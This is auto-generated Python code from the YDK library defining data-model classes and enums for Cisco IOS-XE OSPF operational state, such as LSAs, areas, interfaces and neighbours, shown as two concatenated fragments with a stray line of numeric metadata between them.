**type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, self).__init__()
self.yang_name = "network-summary-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo))])
self._leafs = OrderedDict([
('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
])
self.summary_lsa_mask = None
self.summary_topo = YList(self)
self._segment_path = lambda: "network-summary-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, ['summary_lsa_mask'], name, value)
class SummaryTopo(Entity):
"""
The summary topology
.. attribute:: mt_id
Multi topology identifier
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: topo_metric
Topology Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, self).__init__()
self.yang_name = "summary-topo"
self.yang_parent_name = "network-summary-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "summary-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
class RouterSummaryLsa(Entity):
"""
The router summary Link State Advertisements
.. attribute:: summary_lsa_mask
The summary Link State Advertisement mask
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: summary_topo
The summary topology
**type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, self).__init__()
self.yang_name = "router-summary-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo))])
self._leafs = OrderedDict([
('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
])
self.summary_lsa_mask = None
self.summary_topo = YList(self)
self._segment_path = lambda: "router-summary-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, ['summary_lsa_mask'], name, value)
class SummaryTopo(Entity):
"""
The summary topology
.. attribute:: mt_id
Multi topology identifier
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: topo_metric
Topology Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, self).__init__()
self.yang_name = "summary-topo"
self.yang_parent_name = "router-summary-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "summary-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
class ExternalLsa(Entity):
"""
The external Link State Advertisements
.. attribute:: external_lsa_mask
The mask for the external Link State Advertisement
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: external_topo
The external topology Link State Advertisement
**type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, self).__init__()
self.yang_name = "external-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo))])
self._leafs = OrderedDict([
('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
])
self.external_lsa_mask = None
self.external_topo = YList(self)
self._segment_path = lambda: "external-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa, ['external_lsa_mask'], name, value)
class ExternalTopo(Entity):
"""
The external topology Link State Advertisement
.. attribute:: mt_id
The multi topology identifier
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: topo_metric_type
The topoligy metric type associated with the Link State Advertisement
**type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>`
**config**\: False
.. attribute:: topo_metric
The topology metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: topo_forwarding_address
The topology forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: topo_route_tag
The topology route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, self).__init__()
self.yang_name = "external-topo"
self.yang_parent_name = "external-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
])
self.mt_id = None
self.topo_metric_type = None
self.topo_metric = None
self.topo_forwarding_address = None
self.topo_route_tag = None
self._segment_path = lambda: "external-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
class NssaLsa(Entity):
"""
The Not So Stubby Area Link state advertisements
.. attribute:: external_lsa_mask
The mask for the external Link State Advertisement
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: external_topo
The external topology Link State Advertisement
**type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, self).__init__()
self.yang_name = "nssa-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo))])
self._leafs = OrderedDict([
('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
])
self.external_lsa_mask = None
self.external_topo = YList(self)
self._segment_path = lambda: "nssa-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa, ['external_lsa_mask'], name, value)
class ExternalTopo(Entity):
"""
The external topology Link State Advertisement
.. attribute:: mt_id
The multi topology identifier
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: topo_metric_type
The topoligy metric type associated with the Link State Advertisement
**type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>`
**config**\: False
.. attribute:: topo_metric
The topology metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: topo_forwarding_address
The topology forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: topo_route_tag
The topology route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, self).__init__()
self.yang_name = "external-topo"
self.yang_parent_name = "nssa-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
])
self.mt_id = None
self.topo_metric_type = None
self.topo_metric = None
self.topo_forwarding_address = None
self.topo_route_tag = None
self._segment_path = lambda: "external-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
def clone_ptr(self):
self._top_entity = OspfOperData()
return self._top_entity
| 53.996849
| 1,779
| 0.368293
|
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class AddressFamily(Enum):
address_family_ipv4 = Enum.YLeaf(0, "address-family-ipv4")
address_family_ipv6 = Enum.YLeaf(1, "address-family-ipv6")
class NbrStateType(Enum):
ospf_nbr_down = Enum.YLeaf(1, "ospf-nbr-down")
ospf_nbr_attempt = Enum.YLeaf(2, "ospf-nbr-attempt")
ospf_nbr_init = Enum.YLeaf(3, "ospf-nbr-init")
ospf_nbr_two_way = Enum.YLeaf(4, "ospf-nbr-two-way")
ospf_nbr_exchange_start = Enum.YLeaf(5, "ospf-nbr-exchange-start")
ospf_nbr_exchange = Enum.YLeaf(6, "ospf-nbr-exchange")
ospf_nbr_loading = Enum.YLeaf(7, "ospf-nbr-loading")
ospf_nbr_full = Enum.YLeaf(8, "ospf-nbr-full")
class OspfAuthType(Enum):
ospf_auth_ipsec = Enum.YLeaf(0, "ospf-auth-ipsec")
ospf_auth_trailer_keychain = Enum.YLeaf(1, "ospf-auth-trailer-keychain")
ospf_auth_trailer_key = Enum.YLeaf(2, "ospf-auth-trailer-key")
ospf_auth_type_none = Enum.YLeaf(3, "ospf-auth-type-none")
class OspfExternalMetricType(Enum):
ospf_ext_metric_type_1 = Enum.YLeaf(0, "ospf-ext-metric-type-1")
ospf_ext_metric_type_2 = Enum.YLeaf(1, "ospf-ext-metric-type-2")
class OspfNetworkType(Enum):
ospf_broadcast = Enum.YLeaf(0, "ospf-broadcast")
ospf_non_broadcast = Enum.YLeaf(1, "ospf-non-broadcast")
ospf_point_to_multipoint = Enum.YLeaf(2, "ospf-point-to-multipoint")
ospf_point_to_point = Enum.YLeaf(3, "ospf-point-to-point")
class OspfOperationMode(Enum):
ospf_ships_in_the_night = Enum.YLeaf(0, "ospf-ships-in-the-night")
class Ospfv2AuthTypeSelection(Enum):
ospfv2_auth_none = Enum.YLeaf(0, "ospfv2-auth-none")
ospfv2_auth_trailer_key = Enum.YLeaf(1, "ospfv2-auth-trailer-key")
ospfv2_auth_trailer_key_chain = Enum.YLeaf(2, "ospfv2-auth-trailer-key-chain")
class Ospfv2CryptoAlgorithm(Enum):
ospfv2_crypto_cleartest = Enum.YLeaf(0, "ospfv2-crypto-cleartest")
ospfv2_crypto_md5 = Enum.YLeaf(1, "ospfv2-crypto-md5")
class Ospfv2IntfState(Enum):
ospfv2_interface_state_down = Enum.YLeaf(0, "ospfv2-interface-state-down")
ospfv2_interface_state_loopback = Enum.YLeaf(1, "ospfv2-interface-state-loopback")
ospfv2_interface_state_waiting = Enum.YLeaf(2, "ospfv2-interface-state-waiting")
ospfv2_interface_state_point_to_mpoint = Enum.YLeaf(3, "ospfv2-interface-state-point-to-mpoint")
ospfv2_interface_state_point_to_point = Enum.YLeaf(4, "ospfv2-interface-state-point-to-point")
ospfv2_interface_state_dr = Enum.YLeaf(5, "ospfv2-interface-state-dr")
ospfv2_interface_state_backup = Enum.YLeaf(6, "ospfv2-interface-state-backup")
ospfv2_interface_state_other = Enum.YLeaf(7, "ospfv2-interface-state-other")
class Ospfv2LsaType(Enum):
ospfv2_lsa_type_unsupported_lsa_type = Enum.YLeaf(0, "ospfv2-lsa-type-unsupported-lsa-type")
ospfv2_lsa_type_router = Enum.YLeaf(1, "ospfv2-lsa-type-router")
ospfv2_lsa_type_network = Enum.YLeaf(2, "ospfv2-lsa-type-network")
ospfv2_lsa_type_summary_net = Enum.YLeaf(3, "ospfv2-lsa-type-summary-net")
ospfv2_lsa_type_summary_router = Enum.YLeaf(4, "ospfv2-lsa-type-summary-router")
ospfv2_lsa_type_as_external = Enum.YLeaf(5, "ospfv2-lsa-type-as-external")
ospfv2_lsa_type_nssa = Enum.YLeaf(6, "ospfv2-lsa-type-nssa")
ospfv2_lsa_type_link_scope_opaque = Enum.YLeaf(7, "ospfv2-lsa-type-link-scope-opaque")
ospfv2_lsa_type_area_scope_opaque = Enum.YLeaf(8, "ospfv2-lsa-type-area-scope-opaque")
ospfv2_lsa_type_as_scope_opaque = Enum.YLeaf(9, "ospfv2-lsa-type-as-scope-opaque")
class OspfOperData(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData, self).__init__()
self._top_entity = None
self.yang_name = "ospf-oper-data"
self.yang_parent_name = "Cisco-IOS-XE-ospf-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ospf-state", ("ospf_state", OspfOperData.OspfState)), ("ospfv2-instance", ("ospfv2_instance", OspfOperData.Ospfv2Instance))])
self._leafs = OrderedDict()
self.ospf_state = None
self._children_name_map["ospf_state"] = "ospf-state"
self.ospfv2_instance = YList(self)
self._segment_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData, [], name, value)
class OspfState(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState, self).__init__()
self.yang_name = "ospf-state"
self.yang_parent_name = "ospf-oper-data"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ospf-instance", ("ospf_instance", OspfOperData.OspfState.OspfInstance))])
self.is_presence_container = True
self._leafs = OrderedDict([
('op_mode', (YLeaf(YType.enumeration, 'op-mode'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfOperationMode', '')])),
])
self.op_mode = None
self.ospf_instance = YList(self)
self._segment_path = lambda: "ospf-state"
self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState, ['op_mode'], name, value)
class OspfInstance(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance, self).__init__()
self.yang_name = "ospf-instance"
self.yang_parent_name = "ospf-state"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['af','router_id']
self._child_classes = OrderedDict([("ospf-area", ("ospf_area", OspfOperData.OspfState.OspfInstance.OspfArea)), ("link-scope-lsas", ("link_scope_lsas", OspfOperData.OspfState.OspfInstance.LinkScopeLsas)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.MultiTopology))])
self._leafs = OrderedDict([
('af', (YLeaf(YType.enumeration, 'af'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'AddressFamily', '')])),
('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])),
('process_id', (YLeaf(YType.uint16, 'process-id'), ['int'])),
])
self.af = None
self.router_id = None
self.process_id = None
self.ospf_area = YList(self)
self.link_scope_lsas = YList(self)
self.multi_topology = YList(self)
self._segment_path = lambda: "ospf-instance" + "[af='" + str(self.af) + "']" + "[router-id='" + str(self.router_id) + "']"
self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/ospf-state/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance, ['af', 'router_id', 'process_id'], name, value)
class OspfArea(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea, self).__init__()
self.yang_name = "ospf-area"
self.yang_parent_name = "ospf-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['area_id']
self._child_classes = OrderedDict([("ospf-interface", ("ospf_interface", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa))])
self._leafs = OrderedDict([
('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])),
])
self.area_id = None
self.ospf_interface = YList(self)
self.area_scope_lsa = YList(self)
self._segment_path = lambda: "ospf-area" + "[area-id='" + str(self.area_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea, ['area_id'], name, value)
class OspfInterface(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, self).__init__()
self.yang_name = "ospf-interface"
self.yang_parent_name = "ospf-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([("multi-area", ("multi_area", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea)), ("static-neighbor", ("static_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor)), ("fast-reroute", ("fast_reroute", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute)), ("ttl-security", ("ttl_security", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity)), ("authentication", ("authentication", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication)), ("ospf-neighbor", ("ospf_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor)), ("intf-link-scope-lsas", ("intf_link_scope_lsas", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas)), ("intf-multi-topology", ("intf_multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology))])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])),
('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])),
('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])),
('node_flag', (YLeaf(YType.boolean, 'node-flag'), ['bool'])),
('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])),
('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])),
('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])),
('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])),
('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])),
('lls', (YLeaf(YType.boolean, 'lls'), ['bool'])),
('prefix_suppression', (YLeaf(YType.boolean, 'prefix-suppression'), ['bool'])),
('bfd', (YLeaf(YType.boolean, 'bfd'), ['bool'])),
('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])),
('state', (YLeaf(YType.str, 'state'), ['str'])),
('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])),
('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])),
('dr', (YLeaf(YType.str, 'dr'), ['str','str'])),
('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])),
('priority', (YLeaf(YType.uint8, 'priority'), ['int'])),
])
self.name = None
self.network_type = None
self.passive = None
self.demand_circuit = None
self.node_flag = None
self.cost = None
self.hello_interval = None
self.dead_interval = None
self.retransmit_interval = None
self.transmit_delay = None
self.mtu_ignore = None
self.lls = None
self.prefix_suppression = None
self.bfd = None
self.enable = None
self.state = None
self.hello_timer = None
self.wait_timer = None
self.dr = None
self.bdr = None
self.priority = None
self.multi_area = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea()
self.multi_area.parent = self
self._children_name_map["multi_area"] = "multi-area"
self.fast_reroute = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute()
self.fast_reroute.parent = self
self._children_name_map["fast_reroute"] = "fast-reroute"
self.ttl_security = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity()
self.ttl_security.parent = self
self._children_name_map["ttl_security"] = "ttl-security"
self.authentication = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication()
self.authentication.parent = self
self._children_name_map["authentication"] = "authentication"
self.static_neighbor = YList(self)
self.ospf_neighbor = YList(self)
self.intf_link_scope_lsas = YList(self)
self.intf_multi_topology = YList(self)
self._segment_path = lambda: "ospf-interface" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, ['name', 'network_type', 'passive', 'demand_circuit', 'node_flag', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'mtu_ignore', 'lls', 'prefix_suppression', 'bfd', 'enable', 'state', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'priority'], name, value)
class MultiArea(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, self).__init__()
self.yang_name = "multi-area"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('multi_area_id', (YLeaf(YType.uint32, 'multi-area-id'), ['int'])),
('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
])
self.multi_area_id = None
self.cost = None
self._segment_path = lambda: "multi-area"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, ['multi_area_id', 'cost'], name, value)
class StaticNeighbor(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, self).__init__()
self.yang_name = "static-neighbor"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['address']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', (YLeaf(YType.str, 'address'), ['str','str'])),
('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
('poll_interval', (YLeaf(YType.uint16, 'poll-interval'), ['int'])),
])
self.address = None
self.cost = None
self.poll_interval = None
self._segment_path = lambda: "static-neighbor" + "[address='" + str(self.address) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, ['address', 'cost', 'poll_interval'], name, value)
class FastReroute(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, self).__init__()
self.yang_name = "fast-reroute"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('candidate_disabled', (YLeaf(YType.boolean, 'candidate-disabled'), ['bool'])),
('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])),
('remote_lfa_enabled', (YLeaf(YType.boolean, 'remote-lfa-enabled'), ['bool'])),
])
self.candidate_disabled = None
self.enabled = None
self.remote_lfa_enabled = None
self._segment_path = lambda: "fast-reroute"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, ['candidate_disabled', 'enabled', 'remote_lfa_enabled'], name, value)
class TtlSecurity(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, self).__init__()
self.yang_name = "ttl-security"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])),
('hops', (YLeaf(YType.uint8, 'hops'), ['int'])),
])
self.enabled = None
self.hops = None
self._segment_path = lambda: "ttl-security"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, ['enabled', 'hops'], name, value)
class Authentication(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, self).__init__()
self.yang_name = "authentication"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("crypto-algorithm-val", ("crypto_algorithm_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal))])
self._leafs = OrderedDict([
